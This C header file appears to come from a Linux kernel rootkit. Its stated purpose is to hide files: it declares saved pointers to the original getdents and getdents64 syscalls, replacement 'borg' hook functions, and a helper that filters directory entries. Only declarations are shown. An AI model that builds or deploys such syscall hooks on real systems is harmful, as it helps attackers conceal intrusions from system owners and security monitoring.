/**
 * @file getdents64.h
 * @brief Hide files.
 */

/** A sys_getdirents() call. */
#define DIRENT		( 1 << 1 )
/** A sys_getdirents64() call. */
#define DIRENT64	( 1 << 2 )

/** Original getdents64(). */
extern asmlinkage long (*original_getdents64)(unsigned int, void *, unsigned int);
/** Original getdents(). */
extern asmlinkage long (*original_getdents)(unsigned int, void *, unsigned int);

/** Used in getdents(). */
struct linux_dirent
{
    unsigned long d_ino;
    unsigned long d_off;
    unsigned short d_reclen;
    char d_name[1];
};

/**
 * Borged getdents64().
 * @param fd Directory file descriptor returned by open().
 * @param dirent Output buffer.
 * @param count Maximum output.
 * @return Number of bytes read.
 */
asmlinkage long borg_getdents64(unsigned int fd, void *dirent, unsigned int count);

/**
 * Borged getdents().
 * @param fd Directory file descriptor returned by open().
 * @param direct Output buffer.
 * @param count Maximum output.
 * @return Number of bytes read.
 */
asmlinkage long borg_getdents(unsigned int fd, void *dirent, unsigned int count);

/**
 * Hides linux_dirent or linux_dirent64 structs.
 * @param type Either DIRENT or DIRENT64.
 * @param origret Return code from getdents() or getdents64().
 * @param fd Directory file descriptor returned by open().
 * @param direct Output buffer.
 * @param count Maximum output.
 * @return Number of bytes read.
 */
long borg_dirents(int type, long origret, unsigned int fd, void *dirent, unsigned int count);
